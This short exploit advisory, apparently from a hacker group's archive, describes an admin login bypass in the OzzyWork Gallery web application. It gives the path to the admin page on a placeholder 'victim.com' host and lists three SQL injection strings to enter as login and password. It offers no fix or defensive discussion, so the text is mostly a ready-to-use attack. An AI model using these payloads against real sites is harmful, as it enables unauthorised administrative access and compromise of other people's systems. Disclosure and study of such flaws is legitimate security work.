OzzyWork Gallery suffers from an administrative login bypass vulnerability.
c29763013b435928dfe18fe523ca657bbbc5030de416c9d3bf8520fc348b338e
# Milli-Harekat Advisory ( www.milli-harekat.org )
# OzzyWork Galeri Admin SQL Injection
# Risk : High
# Script : OzzyWork Gallery All Version
# Credits : Dj ReMix
# Thanks : ßy Korsan , ESKOBAR , Poizonb0x , TR_IP
OzzyWork Gallery Admin Page's www.victim.com/[Ozzywork Path ]/admin_default.asp
Login and password :
'or'
'or"1=1'
'or"='